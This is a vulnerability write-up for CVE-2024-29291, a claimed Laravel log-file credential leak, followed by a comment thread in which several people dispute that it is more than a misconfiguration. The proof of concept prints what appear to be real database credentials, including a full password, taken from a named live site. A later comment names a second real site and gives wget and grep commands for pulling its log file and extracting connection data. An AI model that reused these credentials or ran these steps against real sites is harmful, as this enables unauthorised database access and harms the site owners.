CVE-2024-29291

CVE-ID: CVE-2024-29291

Description:

A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.

Additional Information:

None.

Risk:

High.

Vulnerability Type:

Database credential leak vulnerability.

Vendor of Product:

Laravel Framework.

Affected Product Code Base:

Laravel FRAMEWORK - 8.* - 11.*

Affected Component:

laravel.log.

Attack Type:

Remote.

Impact Information Disclosure:

True.

Attack Vectors:

Database credential leak vulnerability.

Description:

Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.

Proof of concept:

Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:

Username: u429384055_jscv
Password: Jaly$$a0p0p0p0

Host: sql1...

Now you can login to the database.

By: Huseein Amer
Facebook: https://www.facebook.com/hussein.amer.75491/

This only works in misconfigured apps, right?
/storage should be symlinked to /storage/app/public when using php artisan storage:link

This only works in misconfigured apps, right? /storage should be symlinked to /storage/app/public when using php artisan storage:link

The problem lies in the laravel.log file, where the system stores the login data in the log file

if you can navigate to storage/logs/laravel.log you can just as well do cat .env
Also, turn off debug mode please.

To anyone reading this: This does not deserve a CVE. Don't waste your time.

This is a misconception based on a deployment error.
The app should have been in prod logging mode with a loglevel higher than debug AND the /public folder should have been the root of the web path so that storage/logs was never accessible in the first place.
If storage/logs is accessible, so is .env, config/ and vendor/

if you can navigate to storage/logs/laravel.log you can just as well do cat .env Also, turn off debug mode please.

To anyone reading this: This does not deserve a CVE. Don't waste your time.

This is a misconception based on a deployment error. The app should have been in prod logging mode with a loglevel higher than debug AND the /public folder should have been the root of the web path so that storage/logs was never accessible in the first place. If storage/logs is accessible, so is .env, config/ and vendor/

mr Jelle-SamsonIT
Connection data can be displayed even if the .env file cannot be read by an attacker. It is enough just to have the ability to read the log file.
As on the site
https://www.digo.sa/.env
It shows you that 403
Forbidden
Cannot display data from env file
Go
https://www.digo.sa/storage/logs/laravel.log
Write it down
wget https://www.digo.sa/storage/logs/laravel.log
and
grep host laravel.log
and you can now show
'mysql:host=127....', 'africansc_afric...', 'TYumh2rsJ0WP7Qe...'
As for the eligibility to grant CVE, mitre.org has classified it as high risk

Read this documentation https://laravel.com/docs/11.x/filesystem#the-public-disk
it says "The public disk included in your application's filesystems configuration file is intended for files that are going to be publicly accessible. By default, the public disk uses the local driver and stores its files in storage/app/public"
Thus storage/logs should not be accessible.